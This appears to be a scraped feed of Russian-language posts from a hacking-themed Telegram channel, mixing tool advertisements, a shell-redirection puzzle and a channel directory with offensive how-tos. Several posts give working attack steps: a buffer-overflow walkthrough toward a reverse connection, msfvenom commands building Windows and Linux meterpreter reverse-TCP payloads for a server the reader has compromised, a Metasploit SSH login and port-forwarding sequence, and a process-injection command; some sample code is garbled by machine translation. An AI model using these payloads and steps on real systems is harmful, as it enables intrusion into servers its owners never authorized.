Forwarded from Golang
В репозитории содержатся переписанные скрипты по хакингу на Go из следующих книг:
– Violent Python
– Black Hat Python
– Security with Go
– Python Web Penetration Testing Cookbook
– asecuritysite
– Криптография с Python
– Black Hat Go
@Golang_google
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥5❤1👎1
Sitadel — функциональный сканер безопасности веб-приложений на Python.
Полезный и простой в использовании инструмент сталкера.
Возможности:
▪ Собирает информацию о используемых фреймворках, cms, os, языках, серверах и др.вещи на сайте
▪ Брутфорс▪
▪ Поддерживает разные инъекции:
▪ HTML Injection
▪ SQL Injection
▪ LDAP Injection
▪ XPath Injection
▪ Cross Site Scripting (XSS)
▪ Remote File Inclusion (RFI)
▪ PHP Code Injection
$ git clone https://github.com/shenril/Sitadel.git
$ cd Sitadel
$ pip3 install .
$ python sitadel.py --help
🖥 GitHub
@linuxkalii
Полезный и простой в использовании инструмент сталкера.
Возможности:
▪ Собирает информацию о используемых фреймворках, cms, os, языках, серверах и др.вещи на сайте
▪ Брутфорс▪
▪ Поддерживает разные инъекции:
▪ HTML Injection
▪ SQL Injection
▪ LDAP Injection
▪ XPath Injection
▪ Cross Site Scripting (XSS)
▪ Remote File Inclusion (RFI)
▪ PHP Code Injection
$ git clone https://github.com/shenril/Sitadel.git
$ cd Sitadel
$ pip3 install .
$ python sitadel.py --help
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥5❤2👎2😁1
Дана команда:
ls file1 file2. Файл file1 существует, файл file2 не существует.Перенаправьте только стандартную ошибку в конвейер, одновременно, записывая номера строк и перенаправьте вывод в файл. Стандартный вывод должен отображаться на экране.
Решение
2> выделяет ошибки, >(...) передаёт их на обработку в другую программу, nl - нумерует строки, > error.txt - сохраняет их:
$ ls script.sh lost.txt deal missing.txt 2> >(nl > error.txt)
script.sh
deal:
deal_10 deal_11
$ cat error.txt
1 ls: cannot access 'lost.txt': No such file or directory
2 ls: cannot access 'missing.txt': No such file or directory
$Пишите свое решение в комментариях👇
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤5🔥2
🔥 Огромная, наглядная шпаргалка для Backend-разработки на русском языке
Весь материал разбит на темы и подтемы:
•Сеть и интернет
•Устройство ПК
•Основы Linux
•Базы данных
•Разработка API
•Безопасность
•Тестирование и многое другое
Структура материала состоит из трех частей:
📌 Визуальная часть - различные изображения/таблицы/шпаргалки для лучшего понимания (может отсутствовать). Все рисунки и таблицы сделаны с нуля, специально для этого репозитория.
📌 Краткое описание - очень краткая выжимка информации с перечнем основных терминов и понятий. На термины навешиваются гиперссылки ведущие на соответсвующий раздел в Википедии или подобном справочном ресурсе.
📌 Ссылки на источники - ресурсы, где можно найти полную информацию по конкретному вопросу. По возможности, указываются максимально авторитетные источники, либо же те, которые предоставляют информацию максимально простым и понятным языком.
Лойс 👍
#doc #cheatsheet #russian
@linuxkalii
Весь материал разбит на темы и подтемы:
•Сеть и интернет
•Устройство ПК
•Основы Linux
•Базы данных
•Разработка API
•Безопасность
•Тестирование и многое другое
Структура материала состоит из трех частей:
📌 Визуальная часть - различные изображения/таблицы/шпаргалки для лучшего понимания (может отсутствовать). Все рисунки и таблицы сделаны с нуля, специально для этого репозитория.
📌 Краткое описание - очень краткая выжимка информации с перечнем основных терминов и понятий. На термины навешиваются гиперссылки ведущие на соответсвующий раздел в Википедии или подобном справочном ресурсе.
📌 Ссылки на источники - ресурсы, где можно найти полную информацию по конкретному вопросу. По возможности, указываются максимально авторитетные источники, либо же те, которые предоставляют информацию максимально простым и понятным языком.
Лойс 👍
#doc #cheatsheet #russian
@linuxkalii
👍32❤6🔥4👏1
Soinjector – инжектор общих обьектов для линукса, написанный на чистом С.
Может быть полезен когда нужно изменить поведение программы или для того, чтобы добавить программе новый функционал без необходимости перекомпиляции исходного кода
🖥 Github
📄 Документация
@linuxkalii
Может быть полезен когда нужно изменить поведение программы или для того, чтобы добавить программе новый функционал без необходимости перекомпиляции исходного кода
sudo ./injector <lib_path> <pid>📄 Документация
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥3❤1
💣Коротко о перезаписи буфера💣
Рассмотрим как делается перезапись буфера. Давайте приступим к практике.
#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.
#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.
Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.
#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:
для x в диапазоне (1, 256):
печать ("\x" + "{:02x}".формат (x), конец=")
печать()
Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)
это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.
Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯
#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.
Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).
@linuxkalii
Рассмотрим как делается перезапись буфера. Давайте приступим к практике.
#Immunity debugger
Для того чтобы грамотно выполнить данную атаку нам понадобится Immunity debugger. Это программное обеспечение для работы с обратной инженерией. В нем мы должны запустить приложение с exe форматом, которое обращается к серверу. И если оно написано не очень грамотно у нас будет возможность перезаписать буфер и в результате получить обратное подключение к серверу.
#fuzzing
Первое что мы должны сделать - это использовать фаззинг приложения, чтобы узнать через сколько отправленных байтов оно "Крашнется". Это делается с помощью скрипта на python.
Наша цель тут найти точное значение, поэтому одним скриптом тут не обойдешься, и нам нужно прибавить к нашему результату из скрипта 400 дополнительных байт и отправить их с помощью другого скрипта, в качестве полезной нагрузки.
#эксплуатация
После того, как мы нашли offset и нашли смещение, вам нужно добавить определенную строку в качестве полезной нагрузки в заданный exploit.py . Эта конкретная строка строится с помощью трех простых строк python:
для x в диапазоне (1, 256):
печать ("\x" + "{:02x}".формат (x), конец=")
печать()
Который приведет к следующему:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74... (и тд)
это просто байт-код в порядке возрастания. Таким образом, \x01 - это 01, а \x02 - 02 и т. Д.
Если у вас есть набор смещения, заполнения (BBBB) и полезной нагрузки, вы можете запустить exploit.py против приложения, которое должно аварийно завершить работу с EIP, установленным на 42424242. Щелкните правой кнопкой мыши на ESP и нажмите "следовать в дампе", который должен перейти по адресу ESP. Вы можете немного прокрутить вверх, чтобы проверить, расположены ли ваши AAA и BBBB.
Пример: 🗯У вас строки могут быть другие, это просто наглядный пример чтобы вы поняли🗯
#плохие персонажи
Теперь начинается самая простая часть, просто начните со строки 018DFA30 и считайте вверх для шестнадцатеричных значений. Первый плохой символ - 07, потому что там должно быть 07, но там написано 0A.
Таким образом, это означает, что программа неправильно обрабатывает входные данные. Удалите \x07 из полезной нагрузки, перезапустите приложение и снова запустите эксплойт. Повторяйте до последнего символа вашей конкретной строки (FF соответственно \XFF).
@linuxkalii
👍15❤2🔥2
Free proxy scraper written in python.
Бесплатный прокси-скрапер, написанный на python.
pip install free-proxy
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3❤2🥰2👎1
👁🗨Port forwarding👁🗨
Переадресация портов устанавливает безопасное соединение между удаленным пользователем и локальными машинами. В организациях можно указать номера портов источника и назначения, чтобы использовать туннелирование с помощью Linux. Наряду с этим они также должны указать пункт назначения, который может быть IP-адресом или именем хоста.
Давайте включим машину Kali Linux и проверим, размещена ли веб-страница на нашем local host'е. Итак, давайте посмотрим, как локальный адрес и порт могут быть перенаправлены на удаленный хост. Этого можно добиться разными способами, поэтому давайте рассмотрим их по очереди.
use auxiliary/scanner/ssh/ssh_login
set rhosts (ip удаленной машины)
set username (логин)
set password (пароль)
exploit
sessions -u 1
sessions 2
netstat -antp
portfwd добавить -l 8081 -p 8080 -r 127.0.0.1
@linuxkalii
Переадресация портов устанавливает безопасное соединение между удаленным пользователем и локальными машинами. В организациях можно указать номера портов источника и назначения, чтобы использовать туннелирование с помощью Linux. Наряду с этим они также должны указать пункт назначения, который может быть IP-адресом или именем хоста.
Давайте включим машину Kali Linux и проверим, размещена ли веб-страница на нашем local host'е. Итак, давайте посмотрим, как локальный адрес и порт могут быть перенаправлены на удаленный хост. Этого можно добиться разными способами, поэтому давайте рассмотрим их по очереди.
use auxiliary/scanner/ssh/ssh_login
set rhosts (ip удаленной машины)
set username (логин)
set password (пароль)
exploit
sessions -u 1
sessions 2
netstat -antp
portfwd добавить -l 8081 -p 8080 -r 127.0.0.1
@linuxkalii
👍10🔥3❤2👎1👏1
📌 Сети для самых маленьких. Часть нулевая. Планирование
📌 Сети для самых маленьких. Часть первая (которая после нулевой). Подключение к оборудованию cisco
📌 Сети для самых маленьких. Часть вторая. Коммутация
📌 Сети для самых маленьких. Часть третья. Статическая маршрутизация
📌 Сети для самых маленьких. Часть четвертая. L2 и STP
📌 Сети для самых маленьких. Часть пятая. ACL и NAT
📌 Сети для самых маленьких. Часть шестая. Динамическая маршрутизация
📌Сети для самых маленьких. Часть седьмая. VPN
📌 Сети для самых маленьких. Часть восьмая. BGP и IP SLA
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24❤5🔥2
🔥 Top it channels
⭐️ Нейронные сети
@data_analysis_ml - data science
@vistehno - chatgpt ведет блог, решает любые задачи и отвечает на любые ваши вопросы.
@aigen - сети для генерации картинок. видео, музыки и многого другого.
@neural – погружение в нейросети.
🖥 SQL базы данных
@sqllib - библиотека баз данных
@sqlhub - повышение эффективности кода с грамотным использованием бд.
@chat_sql - чат изучения бд.
🖥 Machine learning
@ai_ml – погружение в нейросети, ai, Chatgpt, midjourney, машинное обучение.
@machinelearning_ru – машинное обучении на русском от новичка до профессионала.
@machinelearning_interview – подготовка к собеседованию.
@datascienceiot – бесплатные книги Machine learning
@ArtificialIntelligencedl – канал о искусственном интеллекте
@machinee_learning – чат о машинном обучении
@datascienceml_jobs - работа ds, ml
@Machinelearning_Jobs - чат работы мл
🖥 Python
@pythonl - главный канал самого популярного языка программирования.
@pro_python_code – учим python с ментором.
@python_job_interview – подготовка к Python собеседованию.
@python_testit - проверочные тесты на python
@pythonlbooks - современные книги Python
@python_djangojobs - работа для Python программистов
@python_django_work - чат обсуждения вакансий
🖥 Javascript / front
@react_tg - - 40,14% разработчиков сайтов использовали React в 2022 году - это самая популярная библиотека для создания сайтов.
@javascript -канал для JS и FrontEnd разработчиков. Лучшие практики и примеры кода. Туториалы и фишки JS
@Js Tests - каверзные тесты JS
@hashdev - погружение в web разработку.
@javascriptjobjs - отборные вакансии и работа FrontEnd.
@jsspeak - чат поиска FrontEnd работы.
🖥 Java
@javatg - выучить Java с senior разработчиком по профессиональной методике.
@javachats - чат для ответов на вопросы по Java
@java_library - библиотека книг Java
@android_its - Android разработка
@java_quizes - тесты Java
@Java_workit - работа Java
@progersit - шпаргалки ит
👣 Golang
@Golang_google - восхитительный язык от Google, мощный и перспективный.
@golang_interview - вопросы и ответы с собеседований по Go. Для всех уровней разработчиков.
@golangtests - интересные тесты и задачи GO
@golangl - чат изучающих Go
@GolangJobsit - отборные вакансии и работа GO
@golang_jobsgo - чат для ищущих работу.
@golang_books - полезные книги Golang
@golang_speak - обсуждение языка Go
🖥 Linux
@linux -топ фишки, гайды, уроки по работе с Linux.
@linux chat - чат linux для обучения и помощи.
@linux_read - бесплатные книги linux
👷♂️ IT работа
@hr_itwork -кураторский список актуальных ит-ваканнсии
🤡It memes
@memes_prog - ит-мемы
⚙️ Rust
@rust_code - Rust избавлен от болевых точек, которые есть во многих современных яп
@rust_chats - чат rust
#️⃣ c# c++
C# - объединяет лучшие идеи современных языков программирования
@csharp_cplus чат
С++ - Универсальность. Возможно, этот главный плюс C++.
📓 Книги
@programming_books_it - большая библиотека. программиста
@datascienceiot -ds книги
@pythonlbooks - python библиотека.
@golang_books - книги Golang
@frontendbooksit - front книги
@progersit - ит-шпаргалки
@linux_read - Linux books
@java_library - Java books
🖥 Github
@github_code - лучшие проекты с github
@bigdatai - инструменты по работе с данными
🖥 Devops
Devops - специалист общего профиля, которому нужны обширные знания в области разработки.
📢 English for coders
@english_forprogrammers - Английский для программистов
@data_analysis_ml - data science
@vistehno - chatgpt ведет блог, решает любые задачи и отвечает на любые ваши вопросы.
@aigen - сети для генерации картинок. видео, музыки и многого другого.
@neural – погружение в нейросети.
@sqllib - библиотека баз данных
@sqlhub - повышение эффективности кода с грамотным использованием бд.
@chat_sql - чат изучения бд.
@ai_ml – погружение в нейросети, ai, Chatgpt, midjourney, машинное обучение.
@machinelearning_ru – машинное обучении на русском от новичка до профессионала.
@machinelearning_interview – подготовка к собеседованию.
@datascienceiot – бесплатные книги Machine learning
@ArtificialIntelligencedl – канал о искусственном интеллекте
@machinee_learning – чат о машинном обучении
@datascienceml_jobs - работа ds, ml
@Machinelearning_Jobs - чат работы мл
@pythonl - главный канал самого популярного языка программирования.
@pro_python_code – учим python с ментором.
@python_job_interview – подготовка к Python собеседованию.
@python_testit - проверочные тесты на python
@pythonlbooks - современные книги Python
@python_djangojobs - работа для Python программистов
@python_django_work - чат обсуждения вакансий
@react_tg - - 40,14% разработчиков сайтов использовали React в 2022 году - это самая популярная библиотека для создания сайтов.
@javascript -канал для JS и FrontEnd разработчиков. Лучшие практики и примеры кода. Туториалы и фишки JS
@Js Tests - каверзные тесты JS
@hashdev - погружение в web разработку.
@javascriptjobjs - отборные вакансии и работа FrontEnd.
@jsspeak - чат поиска FrontEnd работы.
@javatg - выучить Java с senior разработчиком по профессиональной методике.
@javachats - чат для ответов на вопросы по Java
@java_library - библиотека книг Java
@android_its - Android разработка
@java_quizes - тесты Java
@Java_workit - работа Java
@progersit - шпаргалки ит
@Golang_google - восхитительный язык от Google, мощный и перспективный.
@golang_interview - вопросы и ответы с собеседований по Go. Для всех уровней разработчиков.
@golangtests - интересные тесты и задачи GO
@golangl - чат изучающих Go
@GolangJobsit - отборные вакансии и работа GO
@golang_jobsgo - чат для ищущих работу.
@golang_books - полезные книги Golang
@golang_speak - обсуждение языка Go
@linux -топ фишки, гайды, уроки по работе с Linux.
@linux chat - чат linux для обучения и помощи.
@linux_read - бесплатные книги linux
👷♂️ IT работа
@hr_itwork -кураторский список актуальных ит-ваканнсии
🤡It memes
@memes_prog - ит-мемы
⚙️ Rust
@rust_code - Rust избавлен от болевых точек, которые есть во многих современных яп
@rust_chats - чат rust
#️⃣ c# c++
C# - объединяет лучшие идеи современных языков программирования
@csharp_cplus чат
С++ - Универсальность. Возможно, этот главный плюс C++.
📓 Книги
@programming_books_it - большая библиотека. программиста
@datascienceiot -ds книги
@pythonlbooks - python библиотека.
@golang_books - книги Golang
@frontendbooksit - front книги
@progersit - ит-шпаргалки
@linux_read - Linux books
@java_library - Java books
@github_code - лучшие проекты с github
@bigdatai - инструменты по работе с данными
Devops - специалист общего профиля, которому нужны обширные знания в области разработки.
@english_forprogrammers - Английский для программистов
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤3
Как получить удаленный доступ к компьютеру или серверу если у вас есть такая возможность.
Для этой цели мы будем использовать Metasploit.
В этот раз, мы не будем говорить о случае, когда у сайта на серваке стоит программное обеспечение старой версии. Разберем вариант, когда вам удалось загрузить туда reverse shelll или же попросту обратную оболочку.
На этом этапе, найдутся знающие люди которые спросят меня, мол зачем тут Metasploit. Ведь мы можем просто открыть нужный порт прописав что-то вроде:
Вот причины по которым выгодно делать это через Metasploit.
1)Обратная оболочка в Metasploit более надежная. И не так быстро разрывается если что-то случится.
2) Вы можете заспавнить оболочку в meterpreter просто написав shell.
3)Вы можете иметь неограниченное количество сессий и свободно переключаться между ними.
Итак перейдем в делу. Есть несколько вариантов использования Metasploit.
Если атакуемый сервер это Windows - то вот ваша полезная нагрузка:
🗨
При этом название используемого эксплойта будет:🗨
Если аттакуемый сервер это Linux - то ваша полезная нагрузка:
🗨
@linuxkalii
Для этой цели мы будем использовать Metasploit.
В этот раз, мы не будем говорить о случае, когда у сайта на серваке стоит программное обеспечение старой версии. Разберем вариант, когда вам удалось загрузить туда reverse shelll или же попросту обратную оболочку.
На этом этапе, найдутся знающие люди которые спросят меня, мол зачем тут Metasploit. Ведь мы можем просто открыть нужный порт прописав что-то вроде:
nc -lvp ваш порт.Вот причины по которым выгодно делать это через Metasploit.
1)Обратная оболочка в Metasploit более надежная. И не так быстро разрывается если что-то случится.
2) Вы можете заспавнить оболочку в meterpreter просто написав shell.
3)Вы можете иметь неограниченное количество сессий и свободно переключаться между ними.
Итак перейдем в делу. Есть несколько вариантов использования Metasploit.
Если атакуемый сервер это Windows - то вот ваша полезная нагрузка:
🗨
msfvenom -p windows/x64/meterpreterreversetcp lhost=Ваш ip lport=Ваш порт -f aspx -o shell.aspxПри этом название используемого эксплойта будет:🗨
use exploit/multi/handler
* Using configured payload generic/shellreversetcp
msf5 exploit(multi/handler) >
🗨 set payload windows/x64/meterpreterreversetcpЕсли аттакуемый сервер это Linux - то ваша полезная нагрузка:
🗨
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=[Ваш ip] LPORT=[Ваш порт] -f elf > shell.elf
Это payload внутри опций в настройках.
🗨set payload linux/x86/meterpreter/reversetcp@linuxkalii
👍12🔥4❤3
PostHog — платформа для сборки и анализа сведений об источниках трафика
Также инструмент позволяет отслеживать взаимодействие пользователей с вашим приложением или сайтом
Отдельным приятным моментом является то, что PostHog имеет открытый исходный код. Его можно скачать с GitHub и развернуть на своей инфраструктуре
Стоимость: #бесплатно (но есть платные тарифы и функции)
#анализ #open_source
@linuxkalii
Также инструмент позволяет отслеживать взаимодействие пользователей с вашим приложением или сайтом
Отдельным приятным моментом является то, что PostHog имеет открытый исходный код. Его можно скачать с GitHub и развернуть на своей инфраструктуре
Стоимость: #бесплатно (но есть платные тарифы и функции)
#анализ #open_source
@linuxkalii
👍8❤2🔥1
Всем нам в голову приходит nmap если мы говорим про сканнеры. И даже у него есть возможность посмотреть уязвимости.
Однако сегодня возьмем в качестве примера OpenVas. Это условно-бесплатное программное обеспечение которое мы с вами сейчас установим.
👁🗨Установка:
🗨apt install docker.io
🗨docker run -d -p 443:443 --name openvas mikesplain/openvas
Эта команда одновременно вытащит контейнер docker, а затем запустит контейнер. Для полной настройки и запуска контейнера может потребоваться несколько минут. Как только он будет завершен, вы сможете перейти к https://127.0.0.1 в вашем предпочтительном браузере и OpenVAS будет настроен и готов к работе!
После того как все будет готово - вашими данными для входа на локал хост будут admin:admin. Вы сможете нажать Task Wizzard чтобы более предметно ознакомится с приложением.
Сканирование уязвимостей подробнее
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤1👎1🔥1
Механизмы безопасности: полезные шпаргалки для разработчиков
Недавно хакеры взломали «СберСпасибо» и опубликовали в сети базу, в которой содержатся несколько миллионов строк с личными данными пользователей. Кто же виноват? Слабая защита? Программисты? Код?
Сделали подборку шпаргалок в которых вы найдете, лучшие практики безопасности для разработчиков:
1. Java
2. Python
3. Go
4. Spring Boot
5. npm
6. GitHub
#java #python #go
Недавно хакеры взломали «СберСпасибо» и опубликовали в сети базу, в которой содержатся несколько миллионов строк с личными данными пользователей. Кто же виноват? Слабая защита? Программисты? Код?
Сделали подборку шпаргалок в которых вы найдете, лучшие практики безопасности для разработчиков:
1. Java
2. Python
3. Go
4. Spring Boot
5. npm
6. GitHub
#java #python #go
👍8🔥2❤1
💀SSTImap — современная утилита для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей внедрения кода и внедрения шаблонов на стороне сервера(Code Injection and Server-Side Template Injection/SSTI), использовать их, предоставляя доступ к самой операционной системе.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub
#redteam #pentest #github #soft #python
@linuxkalii
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub
#redteam #pentest #github #soft #python
@linuxkalii
👍15🔥2❤1